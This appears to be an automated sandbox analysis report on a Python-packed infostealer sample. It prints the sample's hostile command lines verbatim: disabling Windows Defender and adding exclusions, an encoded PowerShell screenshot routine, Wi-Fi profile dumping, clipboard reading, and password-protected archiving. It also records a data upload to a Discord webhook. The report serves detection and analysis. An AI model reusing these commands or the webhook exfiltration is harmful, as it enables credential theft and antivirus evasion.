              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8008, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'", ProcessId: 7452, ProcessName: cmd.exe
              Sigma detected: Suspicious Execution of Powershell with Base64
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1368, TargetFilename: C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline
              Sigma detected: Files Added To An Archive Using Rar.EXE
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7188, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *, ProcessId: 8132, ProcessName: rar.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7544, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

              Stealing of Sensitive Information

              barindex
              Sigma detected: Capture Wi-Fi password
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\e45AiBoV6X.exe", ParentImage: C:\Users\user\Desktop\e45AiBoV6X.exe, ParentProcessId: 7396, ParentProcessName: e45AiBoV6X.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 6556, ProcessName: cmd.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: e45AiBoV6X.exeVirustotal: Detection: 50%Perma Link
              Source: e45AiBoV6X.exeReversingLabs: Detection: 47%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,65_2_00007FF629B0901C
              Source: e45AiBoV6X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997954782.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1993602283.00007FFDFF191000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996506357.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: e45AiBoV6X.exe
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: e45AiBoV6X.exe, 00000001.00000002.1992435238.00007FFDFB77F000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997119035.00007FFE126C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: e45AiBoV6X.exe, 00000001.00000002.1997695526.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994462832.00007FFE0EC41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: e45AiBoV6X.exe, 00000001.00000002.1994882993.00007FFE101D1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995160650.00007FFE1025B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: \bx.pdb source: powershell.exe, 00000025.00000002.1868678671.00000296ED014000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000041.00000000.1882689611.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdb source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: e45AiBoV6X.exe, 00000000.00000003.1716520142.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000001.00000002.1997442294.00007FFE126F1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: e45AiBoV6X.exe, 00000001.00000002.1996803109.00007FFE11EC1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: e45AiBoV6X.exe, 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: e45AiBoV6X.exe, 00000001.00000002.1995817192.00007FFE10301000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.pdbhP source: powershell.exe, 00000025.00000002.1843488107.0000029680385000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: e45AiBoV6X.exe, 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: e45AiBoV6X.exe, e45AiBoV6X.exe, 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,0_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 0_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E85A0 FindFirstFileExW,FindClose,1_2_00007FF6FB1E85A0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB200B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF6FB200B84
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FF6FB1E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6FB1E79B0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeCode function: 1_2_00007FFDFB003229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFB003229
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,65_2_00007FF629B146EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B0E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,65_2_00007FF629B0E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exeCode function: 65_2_00007FF629B588E0 FindFirstFileExA,65_2_00007FF629B588E0
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
              Source: C:\Users\user\Desktop\e45AiBoV6X.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
              Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
              Source: unknownDNS query: name: ip-api.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
              Source: e45AiBoV6X.exe, 00000001.00000002.1988000626.000002290B678000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: ip-api.com
              Source: global trafficDNS traffic detected: DNS query: canary.discord.com
              Source: unknownHTTP traffic detected: POST /api/webhooks/1248781366489907321/ufb6qyCKcRyE7syQfJqh1lNQR64inZBSWaeenuFVMnWhurxQmS0fvG_72iP5niS7D08V HTTP/1.1Host: canary.discord.comAccept-Encoding: identityContent-Length: 696330User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=ee98191e18960bbd7c200f93a176e816
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718378444.000001F32EEEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: e45AiBoV6X.exe, 00000000.00000003.1718073686.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmp, e45AiBoV6X.exe, 00000000.00000003.1718495170.000001F32EEDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
